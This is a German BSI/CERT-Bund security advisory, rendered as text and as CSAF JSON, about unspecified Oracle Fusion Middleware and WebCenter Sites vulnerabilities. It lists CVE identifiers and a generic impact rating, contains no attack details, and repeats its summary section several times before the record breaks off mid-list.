In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
References
4 references
{
"document": {
"aggregate_severity": {
"text": "kritisch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Oracle Fusion Middleware b\u00fcndelt mehrere Produkte zur Erstellung, Betrieb und Management von intelligenten Business Anwendungen.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Oracle Fusion Middleware ausnutzen, um dadurch die Integrit\u00e4t, Vertraulichkeit und Verf\u00fcgbarkeit zu gef\u00e4hrden.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-1277 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2017/wid-sec-w-2024-1277.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-1277 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1277"
},
{
"category": "external",
"summary": "Oracle Critical Patch Update Advisory - April 2017 - Oracle Fusion Middleware vom 2017-04-18",
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixFMW"
},
{
"category": "external",
"summary": "CISA Known Exploited Vulnerabilities Catalog vom 2024-06-03",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"source_lang": "en-US",
"title": "Oracle Fusion Middleware: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2024-11-11T23:00:00.000+00:00",
"generator": {
"date": "2024-11-12T10:06:32.931+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.8"
}
},
"id": "WID-SEC-W-2024-1277",
"initial_release_date": "2017-04-18T22:00:00.000+00:00",
"revision_history": [
{
"date": "2017-04-18T22:00:00.000+00:00",
"number": "1",
"summary": "Initial Release"
},
{
"date": "2017-04-18T22:00:00.000+00:00",
"number": "2",
"summary": "n"
},
{
"date": "2017-04-18T22:00:00.000+00:00",
"number": "3",
"summary": "Version nicht vorhanden"
},
{
"date": "2024-06-03T22:00:00.000+00:00",
"number": "4",
"summary": "Aktive Ausnutzung gemeldet"
},
{
"date": "2024-11-11T23:00:00.000+00:00",
"number": "5",
"summary": "Korrektur"
}
],
"status": "final",
"version": "5"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Oracle Fusion Middleware",
"product": {
"name": "Oracle Fusion Middleware",
"product_id": "T006198",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:fusion_middleware:-"
}
}
},
{
"category": "product_name",
"name": "Oracle WebCenter Sites",
"product": {
"name": "Oracle WebCenter Sites",
"product_id": "T009734",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:webcenter_sites:-"
}
}
}
],
"category": "vendor",
"name": "Oracle"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2012-1007",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2012-1007"
},
{
"cve": "CVE-2014-0114",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2014-0114"
},
{
"cve": "CVE-2015-5351",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2015-5351"
},
{
"cve": "CVE-2015-7501",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2015-7501"
},
{
"cve": "CVE-2016-0706",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-0706"
},
{
"cve": "CVE-2016-0714",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-0714"
},
{
"cve": "CVE-2016-0763",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-0763"
},
{
"cve": "CVE-2016-1181",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-1181"
},
{
"cve": "CVE-2016-1182",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-1182"
},
{
"cve": "CVE-2016-2177",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-2177"
},
{
"cve": "CVE-2016-2178",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-2178"
},
{
"cve": "CVE-2016-2179",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-2179"
},
{
"cve": "CVE-2016-2180",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-2180"
},
{
"cve": "CVE-2016-2181",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-2181"
},
{
"cve": "CVE-2016-2182",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-2182"
},
{
"cve": "CVE-2016-2183",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-2183"
},
{
"cve": "CVE-2016-6302",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-6302"
},
{
"cve": "CVE-2016-6303",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-6303"
},
{
"cve": "CVE-2016-6304",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2016-6304"
},
{
"cve": "CVE-2016-6305",
"notes": [
{
"category": "description",
